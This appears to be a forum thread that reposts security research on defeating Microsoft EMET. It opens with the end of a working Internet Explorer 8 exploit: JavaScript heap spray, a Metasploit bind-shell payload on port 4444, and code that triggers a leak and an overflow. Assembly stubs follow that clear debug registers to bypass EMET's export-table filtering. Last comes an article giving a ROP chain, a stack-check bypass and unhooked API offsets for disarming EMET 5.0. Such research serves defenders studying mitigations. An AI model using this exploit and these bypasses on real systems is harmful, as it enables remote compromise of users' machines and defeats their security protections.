ES:[EDI] // PUSH ESP // PUSH 0FFFFFFFEH // CALL ESI shellcode+= unescape("%ubca1%u6d10%u8b07%u18b0%u0005%u8100%uccec" + "%u0002%uc700%u2404%u0010%u0001%ufc8b%uccb9" + "%u0002%u8300%u04c7%ue983%u3304%uf3c0%u54aa" + "%ufe6a%ud6ff"); shellcode+= unescape("%u9090%u9090"); // NOPs shellcode+= unescape("%u9090%u9090"); // NOPs // EMET disable part 0x02 end // Bind shellcode on 4444 // msf > generate -t js_le // windows/shell_bind_tcp - 342 bytes // http://www.metasploit.com // VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false, // EXITFUNC=process, InitialAutoRunScript=, AutoRunScript= // I would keep the shellcode the same size for better reliability shellcode+= unescape("%ue8fc%u0089%u0000%u8960%u31e5%u64d2%u528b" + "%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a" + "%uff31%uc031%u3cac%u7c61%u2c02%uc120%u0dcf" + "%uc701%uf0e2%u5752%u528b%u8b10%u3c42%ud001" + "%u408b%u8578%u74c0%u014a%u50d0%u488b%u8b18" + "%u2058%ud301%u3ce3%u8b49%u8b34%ud601%uff31" + "%uc031%uc1ac%u0dcf%uc701%ue038%uf475%u7d03" + "%u3bf8%u247d%ue275%u8b58%u2458%ud301%u8b66" + "%u4b0c%u588b%u011c%u8bd3%u8b04%ud001%u4489" + "%u2424%u5b5b%u5961%u515a%ue0ff%u5f58%u8b5a" + "%ueb12%u5d86%u3368%u0032%u6800%u7377%u5f32" + "%u6854%u774c%u0726%ud5ff%u90b8%u0001%u2900" + "%u54c4%u6850%u8029%u006b%ud5ff%u5050%u5050" + "%u5040%u5040%uea68%udf0f%uffe0%u89d5%u31c7" + "%u53db%u0268%u1100%u895c%u6ae6%u5610%u6857" + "%udbc2%u6737%ud5ff%u5753%ub768%u38e9%uffff" + "%u53d5%u5753%u7468%u3bec%uffe1%u57d5%uc789" + "%u7568%u4d6e%uff61%u68d5%u6d63%u0064%ue389" + "%u5757%u3157%u6af6%u5912%ue256%u66fd%u44c7" + "%u3c24%u0101%u448d%u1024%u00c6%u5444%u5650" + "%u5656%u5646%u564e%u5356%u6856%ucc79%u863f" + "%ud5ff%ue089%u564e%uff46%u6830%u8708%u601d" + "%ud5ff%uf0bb%ua2b5%u6856%u95a6%u9dbd%ud5ff" + "%u063c%u0a7c%ufb80%u75e0%ubb05%u1347%u6f72" + "%u006a%uff53%u41d5"); // Total spray should be 1000 var padding = unescape("%u9090"); while (padding.length < 1000) padding = padding + padding; var padding = padding.substr(0, 1000 - shellcode.length); shellcode+= padding; while (shellcode.length < 100000) shellcode = shellcode + shellcode; var onemeg = shellcode.substr(0, 64*1024/2); for (i=0; i<14; i++) { onemeg += shellcode.substr(0, 64*1024/2); } onemeg += shellcode.substr(0, (64*1024/2)-(38/2)); var spray = new Array(); for (i=0; i<100; i++) { spray[i] = onemeg.substr(0, onemeg.length); } } function leak(){ var leak_col = document.getElementById("132"); leak_col.width = "41"; leak_col.span = "19"; } function get_leak() { var str_addr = strtoint(bl[498].substring((0x100-6)/2+11,(0x100-6)/2+13)); str_addr = str_addr - 1410704; var hex = str_addr.toString(16); //alert(hex); setTimeout(function(){heapspray(str_addr)}, 50); } function trigger_overflow(){ var evil_col = document.getElementById("132"); evil_col.width = "1245880"; evil_col.span = "44"; } setTimeout(function(){leak()}, 400); setTimeout(function(){get_leak()},450); setTimeout(function(){trigger_overflow()}, 700); </script> </body> </html> Sursa: http://www.exploit-db.com/exploits/34815/
-
; BYPASSING EMET Export Address Table Access Filtering feature ; ------------------------------------------------------------------ ; just a simple stub for shellcode that erases debug registers ; therefore no more emet breakpoints (no EAF anymore) ; if you want to use it on other systems (than XP) just change the ; NtSetContextThread_XP syscall value. ; ------------------------------------------------------------------ ; ; and just for you information what is EAF (from the help file): ; ; In order to do something "useful", shellcode generally needs to call ; Windows APIs. However, in order to call an API, shellcode must first ; find the address where that API has been loaded. To do this the vast ; majority of shellcode iterates through the export address table of all ; loaded modules, looking for modules that contain useful APIs. Typically ; this involves kernel32.dll or ntdll.dll. Once an interesting module has ; been found, the shellcode can then figure out the address where an API ; in that module resides. This mitigation filters accesses to the Export ; Address Table (EAT), allowing or disallowing the read/write access based ; on the calling code. With EMET in place, most of today?s shellcode will ; be blocked when it tries to lookup the APIs needed for its payload. ; ; ; ; SMALL UPDATE 03/2014: ; -------------------- ; ; Just a hint for people that still use this thing (never had enough motivation ; to write this crap down): ; Back in the day one of the most heavily used antidebugging method was to use ; NtContinue api function (directly or through SEH) to resume execution ; from a given CONTEXT. So long story short you can clear your debug registers ; by calling NtContinue. The syscall number for <=Win7 is 0x40 (on Win8=0x41, ; on Win8.1=0x42). Sample code is provided at the bottom of this file. ; ; ; - Piotr Bania / www.piotrbania.com ; ; ---------- EXAMPLE OF USING NtSetContextThread on XP ----------------------- ; (tasm style) CONTEXT_SIZE equ 0000002cch CURRENT_THREAD equ 0FFFFFFFEh NtSetContextThread_XP equ 0000000D5h mov ebx, esp sub esp, CONTEXT_SIZE mov dword ptr [esp], CONTEXT_DEBUG_REGISTERS ; well zeroing entire struct is not necessary but who cares. mov edi, esp mov ecx, CONTEXT_SIZE add edi, 4 sub ecx, 4 xor eax,eax rep stosb push esp ; context push CURRENT_THREAD call get_delta get_delta: pop edx lea eax, [edx + (offset my_ret - offset get_delta)] push eax push eax mov edx, esp mov eax, NtSetContextThread_XP db 0Fh, 034h ; sysenter my_ret: mov esp, ebx ; *** you are now free, no debug breakpoints *** <write your standard shellcode here...> ; ; ---------- EXAMPLE OF USING NtContinue on Win7 x64 ----------------------- ; (fasm style) CONTEXT_SIZE equ 0000004d0h CONTEXT_FLAGS_OFF equ 000000070h CONTEXT_DEBUG_REGISTERS equ 000100010h NtContinue_WIN7 equ 000000040h sub rsp, CONTEXT_SIZE and sp, 0fff0h mov rdi, rsp mov ecx, CONTEXT_SIZE - 4 add edi, 4 xor eax, eax rep stosb mov dword [rsp+CONTEXT_FLAGS_OFF], CONTEXT_DEBUG_REGISTERS mov dl, 1 mov r10, rsp ; context lea rax, [return_point] push rax xor rax, rax mov eax, NtContinue_WIN7 syscall return_point: Sursa: http://piotrbania.com/all/articles/anti_emet_eaf.txt
-
In our previous Disarming Emet 4.x blog post, we demonstrated how to disarm the ROP mitigations introduced in EMET 4.x by abusing a global variable in the .data section located at a static offset. A general overview of the EMET 5 technical preview has been recently published here. However, the release of the final version introduced several changes that mitigated our attack and we were curious to see how difficult it would be to adapt our previous disarming technique to this new version of EMET. In our research we targeted 32-bit systems and compared the results across different operating systems (Windows 7 SP1, Windows 2008 SP1, Windows 8, Windows 8.1, Windows XP SP3 and Windows 2003 SP2). We chose to use the IE8 ColspanID vulnerability once again in order to maintain consistency through our research. ROP PROTECTIONS CONFIGURATION HARDENING The very first thing that we noticed is that the global variable we exploited to disarm the ROP Protections (ROP-P) routine is not pointing directly to the ROP-P general switch anymore. This variable, which is now at offset 0x000aa84c from the EMET.dll base address, holds an encoded pointer to a structure of 0x560 bytes (See CONFIG_STRUCT in Fig. 1). The ROP-P general switch is now located at CONFIG_STRUCT+0x558 (Fig. 1, Fig.2). Figure 2: ROP-P General Switch Encoded pointers are used to provide a layer of protection for the actual pointer values. These pointer values can be decoded by using the appropriate DecodePointer Windows API. Our first idea was to try to use the DecodePointer function to get the required pointer and then to zero out the general ROP-P switch. This API can usually be found in the Import Address Table (IAT) of several modules loaded by target processes. Additionally, since EMET.dll needs DecodePointer, we can extract the offset from the DLL base address directly from its IAT. The first step, as shown in our previous blog post, is to gather the EMET.dll base address. In this particular case, we will also save the EMET base address somewhere in memory in order to get the absolute address of DecodePointer later on. Once we decode the encoded pointer, disarming ROP becomes a very similar exercise as in our previous exploit. The following ROP gadgets were used to disable the ROP Protections in the IE8 ColspanID exploit: POP EAX # RETN // Pop GetModuleHandle Ptr from the stack GetModuleHandle // GetModuleHandle Ptr MOV EAX,[EAX] # RETN // Get GetModuleHandle Address PUSH EAX # RETN // Call GetModuleHandle POP ECX # RETN // GetModuleHandle RET Address: Pop EMET_CONFIG_STRUCT EMET_STRING_PTR // GetModuleHandle argument EMET_CONFIG_STRUCT // EMET_CONFIG_STRUCT offset POP ESI // Pop MEM_ADDRESS Ptr to save EMET base MEM_ADDRESS MOV [ESI],EAX # RETN // Save EMET base address at MEM_ADDRESS ADD EAX,ECX # RETN // Get the address of EMET_CONFIG_STRUCT MOV EAX,[EAX] // Get the encoded value stored at EMET_CONFIG_STRUCT POP ESI // Pop DecodePointer ARG Ptr from the stack DECODEPTR_ARG_PTR MOV [ESI],EAX // Update DECODEPTR_ARG with encoded value POP EAX # RETN // Pop EMET base address Ptr MEM_ADDRESS MOV EAX,[EAX] // Get EMET Base POP ECX # RETN // Pop DecodePointer offset from the stack DECODEPTR_OFFSET ADD EAX,ECX # RETN // Get the address of DecodePointer in IAT MOV EAX,[EAX] // Get the address of DecodePointer PUSH EAX # RETN // Call DecodePointer POP ECX # RETN // Pop ROP-P Global Switch offset DECODEPTR_ARG ROP_P_OFFSET ADD EAX,ECX # RETN // Get address of ROP-P Global Switch offset POP ECX # RETN // Pop 0 into ECX 0x00000000 MOV [EAX],ECX # RETN // Zero out the ROP-P Global Switch EAF In our previous blog post, we bypassed EAF by using a known technique presented by the security researcher Piotr Bania. The technique makes use of the Windows syscall NtSetContextThread to clear the hardware breakpoints set by EMET on the Export Address Table of kernel32.dll and ntdll.dll. EMET 5 now protects the KERNELBASE.dll Export Address Table as well, but the only new protection implemented in version 5 against the use of the above technique is that now NtSetContextThread as well as NtContinue (which can also be used in a similar way to bypass EAF) are hooked by the toolkit. “Unfortunately”, the hook eventually calls into the ROP-P routine, and since all the checks are already disarmed by the previous ROP chain, it is completely ineffective. The result is that no further changes to the shellcode were needed to bypass EMET 5 with all of its mitigations enabled except for EAF+. By resolving and calling NtSetContextThread, we were once again able to bypass EAF and successfully obtain a remote shell. EAF+ EAF+, on the other hand, introduces a few extra security checks. First of all, it offers the possibility of blacklisting specific modules that should never be allowed to read protected locations (EAT and MZ/PE header of specific modules). For IE, EAF+ blacklists by default mshtml.dll, Adobe Flash flash*.ocx, jscript*.dll, vbscript.dll and vgx.dll. However, since in our case we are resolving NtSetContextThread by directly calling GetProcAddress, we are implicitly bypassing this mitigation. When we ran our exploit with EAF+ enabled, IE crashed without any explanations or EMET-related log entries in the Windows Event Viewer. Our first thought was that EMET detected the stack register being out of the allowed boundaries, as this check and the detection of a mismatch of stack and frame pointer registers are the other two mitigations introduced by EAF+. We were able to verify this by setting a breakpoint at EMET+0x40BA6 (Fig. 3), which is a basic block belonging to the EAF/EAF+ ExceptionHandler (EMET+0x4084A) installed by the toolkit. Figure 3: EAF+ Stack Register Check Since we have already disarmed EMET ROP mitigations as well as DEP/ASLR at this point, we were able to bypass the stack registers check executing the following instructions just before resolving NtSetContextThread: XOR EAX,EAX MOV EAX,DWORD PTR FS:[EAX+18] MOV EAX,DWORD PTR DS:[EAX+4] ADD EAX,-OFFSET XCHG EAX,ESP The first three instructions simply recover the StackBase pointer value for the executing thread from the Thread Environment Block (TEB). We then add a negative offset to fall within StackBase and StackLimit and set ESP to point to this value. 0:021> dt -r1 _TEB ntdll!_TEB +0x000 NtTib : _NT_TIB +0x000 ExceptionList : Ptr32 _EXCEPTION_REGISTRATION_RECORD +0x004 StackBase : Ptr32 Void +0x008 StackLimit : Ptr32 Void +0x00c SubSystemTib : Ptr32 Void +0x010 FiberData : Ptr32 Void +0x010 Version : Uint4B +0x014 ArbitraryUserPointer : Ptr32 Void +0x018 Self : Ptr32 _NT_TIB At this point, we were happy enough as our exploit was working nicely with all the protections enabled. However, as we were reversing the EAF/EAF+ ExceptionHandler, we noticed something interesting. At offset EMET+0x00040E75 (Fig. 4) there is a call to NtSetContextThread, but rather than calling into the hooked Windows Native API, EMET calls a stub that sets up the syscall number into the EAX register and then jumps into NtSetContextThread+0x5 to bypass the EMET shim (Fig. 5). Figure 4: Call to the Unhooked NtSetContextThread The interesting part is that the pointer to this stub is an entry in the configuration structure that we used to disarm the ROP Protections. In other words, we can use this stub as an alternative way to bypass EAF+ as we can directly call into POINTER(CONFIG_STRUCT+0x518) without the need to resolve the NtSetContextThread address. Figure 5: NtSetContextThread unhooked stub This discovery made us even more curious and we started to snoop around the entire structure. We saw that at specific static offsets from the beginning of the structure, you can find pointers to respective stubs for all the hooked Windows APIs: shoujou: desktop ryujin$ ./config_struct.py struct.txt | sort -u Function: KERNELBASE!CreateFileMappingNumaW Offset:0x428 Function: KERNELBASE!CreateFileMappingW Offset:0x410 Function: KERNELBASE!CreateFileW Offset:0x3b0 Function: KERNELBASE!CreateRemoteThreadEx Offset:0x2d8 Function: KERNELBASE!CreateRemoteThreadEx Offset:0x2f0 Function: KERNELBASE!HeapCreate Offset:0x1e8 Function: KERNELBASE!LoadLibraryExA Offset:0x80 Function: KERNELBASE!LoadLibraryExW Offset:0x98 Function: KERNELBASE!MapViewOfFile Offset:0x488 Function: KERNELBASE!MapViewOfFileEx Offset:0x4a0 Function: KERNELBASE!VirtualAlloc Offset:0x110 Function: KERNELBASE!VirtualAllocEx Offset:0x128 Function: KERNELBASE!VirtualProtect Offset:0x188 Function: KERNELBASE!VirtualProtectEx Offset:0x1a0 Function: KERNELBASE!WriteProcessMemory Offset:0x338 Function: kernel32!CreateFileA Offset:0x380 Function: kernel32!CreateFileMappingA Offset:0x3e0 Function: kernel32!CreateFileMappingWStub Offset:0x3f8 Function: kernel32!CreateFileWImplementation Offset:0x398 Function: kernel32!CreateProcessA Offset:0x218 Function: kernel32!CreateProcessInternalA Offset:0x248 Function: kernel32!CreateProcessInternalW Offset:0x260 Function: kernel32!CreateProcessW Offset:0x230 Function: kernel32!CreateRemoteThreadStub Offset:0x2c0 Function: kernel32!HeapCreateStub Offset:0x1d0 Function: kernel32!LoadLibraryA Offset:0x20 Function: kernel32!LoadLibraryExAStub Offset:0x50 Function: kernel32!LoadLibraryExWStub Offset:0x68 Function: kernel32!LoadLibraryW Offset:0x38 Function: kernel32!MapViewOfFileExStub Offset:0x470 Function: kernel32!MapViewOfFileStub Offset:0x458 Function: kernel32!VirtualAllocExStub Offset:0xf8 Function: kernel32!VirtualAllocStub Offset:0xe0 Function: kernel32!VirtualProtectExStub Offset:0x170 Function: kernel32!VirtualProtectStub Offset:0x158 Function: kernel32!WinExec Offset:0x368 Function: kernel32!WriteProcessMemoryStub Offset:0x320 Function: ntdll!LdrHotPatchRoutine Offset:0x8 Function: ntdll!LdrLoadDll Offset:0xc8 Function: ntdll!NtContinue Offset:0x500 Function: ntdll!NtCreateFile Offset:0x3c8 Function: ntdll!NtCreateProcessEx Offset:0x2a8 Function: ntdll!NtMapViewOfSection Offset:0x4e8 Function: ntdll!NtProtectVirtualMemory Offset:0x1b8 Function: ntdll!NtSetContextThread Offset:0x518 Function: ntdll!NtUnmapViewOfSection Offset:0x4d0 Function: ntdll!RtlCreateHeap Offset:0x200 Function: ntdll!ZwAllocateVirtualMemory Offset:0x140 Function: ntdll!ZwCreateProcess Offset:0x290 Function: ntdll!ZwCreateSection Offset:0x440 Function: ntdll!ZwCreateThreadEx Offset:0x308 Function: ntdll!ZwCreateUserProcess Offset:0x278 Function: ntdll!ZwWriteVirtualMemory Offset:0x350 This is particularly troublesome as it provides the attacker with access to the most powerful APIs completely unhooked and without the need of resolving their addresses once EMET CONFIG_STRUCT is gathered. However, since Deep Hooks are enabled by default, if the attacker plans to use one of the above APIs without disarming EMET in first place, they would need to call the deepest API in the chain. As usual, the full exploit can be found at The Exploit Database. The exploit uses the stub at POINTER(CONFIG_STRUCT+0x518) to bypass EAF+ as well as the ROP chain presented in this blog post. Figure 6: Remote Shell with EMET 5 enabled ASR The Attack Surface Reduction (ASR) feature in EMET 5.0 helps reduce the exposure of applications by preventing the loading of specific modules or plugins within the target application. This protection can really be effective in cases where an attacker forces the target application to load a specific DLL to bypass ASLR (Java msvcr71.dll is a very typical case). Protection provided by ASR does not affect our exploit in any way because we are using a memory leak to bypass ASLR in the IE ColspanID exploit. We are also not loading any extra modules to bypass DEP. Nevertheless, we conducted some research to understand where this mitigation is located within EMET.dll. Once again, we noticed that the actual checks are done within the very same ROP-P routine, thereby making ASR entirely ineffective once the ROP-P general switch has been zeroed out. However, if an attacker is planning to force the target application to load a blacklisted module to bypass ASLR, he wouldn’t be able to disarm the EMET ASR protection using our technique before loading the forbidden DLL. PORTABILITY Our testing on older operating systems shows that the offset to the CONFIG_STRUCT global variable changes to 0x000b0b4c due to the fact that a different EMET.dll is in use. Nevertheless, offsets within the structure are consistent in all pre- and post-Vista Windows versions, both for the ROP-P general switch and for the unhooked APIs stubs. The only real differences are present when certain API functions are simply not available in the OS, such as in the case of KERNELBASE.DLL in Windows versions prior to Windows 7. CONCLUSION As we managed to successfully demonstrate, the difficulty in disarming EMET 5 mitigations has not increased substantially since version 4.x. More than anything, only our ROP chain has increased in size, while achieving the same effect of bypassing the protections offered by EMET. Here’s a video of our PoC IE exploit bypassing EMET v5.0: Sursa: http://www.offensive-security.com/vulndev/disarming-emet-v5-0/